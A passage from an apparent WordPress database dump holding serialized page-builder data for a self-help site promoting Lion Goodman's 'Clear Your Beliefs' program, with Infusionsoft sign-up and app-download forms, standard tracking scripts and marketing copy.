class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1678:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p> \n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1459:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1448, 1863, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2150:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1459:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1449, 1864, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2150:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1459:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	